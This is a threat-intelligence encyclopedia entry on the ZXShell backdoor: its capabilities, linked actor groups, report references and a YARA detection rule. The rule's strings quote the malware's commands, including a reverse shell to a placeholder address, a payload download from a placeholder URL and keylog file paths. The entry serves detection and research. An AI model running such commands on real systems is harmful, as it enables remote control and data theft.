SYMBOLCOMMON_NAMEaka. SYNONYMS
win.zxshell (Back to overview)

ZXShell

aka: Sensocode

Actor(s): APT41, EMISSARY PANDA, Leviathan

According to FireEye, ZXSHELL is a backdoor that can be downloaded from the internet, particularly Chinese hacker websites. The backdoor can launch port scans, run a keylogger, capture screenshots, set up an HTTP or SOCKS proxy, launch a reverse command shell, cause SYN floods, and transfer/delete/run files. The publicly available version of the tool provides a graphical user interface that malicious actors can use to interact with victim backdoors. Simplified Chinese is the language used for the bundled ZXSHELL documentation.

References
2023-05-15SymantecThreat Hunter Team
Lancefly: Group Uses Custom Backdoor to Target Orgs in Government, Aviation, Other Sectors
Merdoor PlugX ShadowPad ZXShell Lancefly
2022-07-18Palo Alto Networks Unit 42Unit 42
Iron Taurus
CHINACHOPPER Ghost RAT Wonknu ZXShell APT27
2022-05-09Qianxin Threat Intelligence CenterRed Raindrops Team
Operation EviLoong: An electronic party of "borderless" hackers
ZXShell
2020-07-20Risky.bizDaniel Gordon
What even is Winnti?
CCleaner Backdoor Ghost RAT PlugX ZXShell
2020-04-07BlackberryBlackberry Research
Decade of the RATS: Cross-Platform APT Espionage Attacks Targeting Linux, Windows and Android
Penquin Turla XOR DDoS ZXShell
2020-01-13Lab52Jagaimo Kawaii
APT27 ZxShell RootKit module updates
ZXShell
2020-01-01SecureworksSecureWorks
BRONZE KEYSTONE
9002 RAT BLACKCOFFEE DeputyDog Derusbi HiKit PlugX Poison Ivy ZXShell APT17
2020-01-01SecureworksSecureWorks
BRONZE UNION
9002 RAT CHINACHOPPER Enfal Ghost RAT HttpBrowser HyperBro owaauth PlugX Poison Ivy ZXShell APT27
2019-11-19FireEyeKelli Vanderlee, Nalani Fraser
Achievement Unlocked: Chinese Cyber Espionage Evolves to Support Higher Level Missions
MESSAGETAP TSCookie ACEHASH CHINACHOPPER Cobalt Strike Derusbi Empire Downloader Ghost RAT HIGHNOON HTran MimiKatz NetWire RC POISONPLUG Poison Ivy pupy Quasar RAT ZXShell
2019-11-06VirusBulletinBowen Pan, Lion Gu
A vine climbing over the Great Firewall: a long‑term attack against China
Poison Ivy ZXShell GreenSpot
2019-09-23MITREMITRE ATT&CK
APT41
Derusbi MESSAGETAP Winnti ASPXSpy BLACKCOFFEE CHINACHOPPER Cobalt Strike Derusbi Empire Downloader Ghost RAT MimiKatz NjRAT PlugX ShadowPad Winnti ZXShell APT41
2019-09-19MeltX0R
Emissary Panda APT: Recent infrastructure and RAT analysis
ZXShell
2019-02-27SecureworksCTU Research Team
A Peek into BRONZE UNION’s Toolbox
Ghost RAT HyperBro ZXShell
2019-01-01Virus BulletinBowen Pan, Lion Gu
A vine climbing over the Great Firewall: A long-term attack against China
Poison Ivy ZXShell
2017-05-31MITREMITRE ATT&CK
Axiom
Derusbi 9002 RAT BLACKCOFFEE Derusbi Ghost RAT HiKit PlugX ZXShell APT17
2016-10-28Github (smb01)smb01
zxshell repository
ZXShell
2014-10-28CiscoAlain Zidouemba, Andrea Allievi, Douglas Goddard, Shaun Hurley
Threat Spotlight: Group 72, Opening the ZxShell
ZXShell
Yara Rules
[TLP:WHITE] win_zxshell_w0 (20180301 | No description)
rule win_zxshell_w0 {
    meta:
        author = "Florian Roth"
        reference = "https://blogs.rsa.com/cat-phishing/"
        malpedia_reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zxshell"
        malpedia_version = "20180301"
        malpedia_license = "CC BY-NC-SA 4.0"
        malpedia_sharing = "TLP:WHITE"
    strings:
        $x1 = "zxplug -add" fullword ascii
        $x2 = "getxxx c:\\xyz.dll" fullword ascii
        $x3 = "downfile -d c:\\windows\\update.exe" fullword ascii
        $x4 = "-fromurl http://x.x.x/x.dll" fullword ascii
        $x5 = "ping 127.0.0.1 -n 7&cmd.exe /c net start %s" fullword ascii
        $x6 = "ZXNC -e cmd.exe x.x.x.x" fullword ascii
        $x7 = "(bind a cmdshell)" fullword ascii
        $x8 = "ZXFtpServer 21 20 zx" fullword ascii
        $x9 = "ZXHttpServer" fullword ascii
        $x10 = "c:\\error.htm,.exe|c:\\a.exe,.zip|c:\\b.zip\"" fullword ascii
        $x11 = "c:\\windows\\clipboardlog.txt" fullword ascii
        $x12 = "AntiSniff -a wireshark.exe" fullword ascii
        $x13 = "c:\\windows\\keylog.txt" fullword ascii
    condition:
        3 of them
}
Download all Yara Rules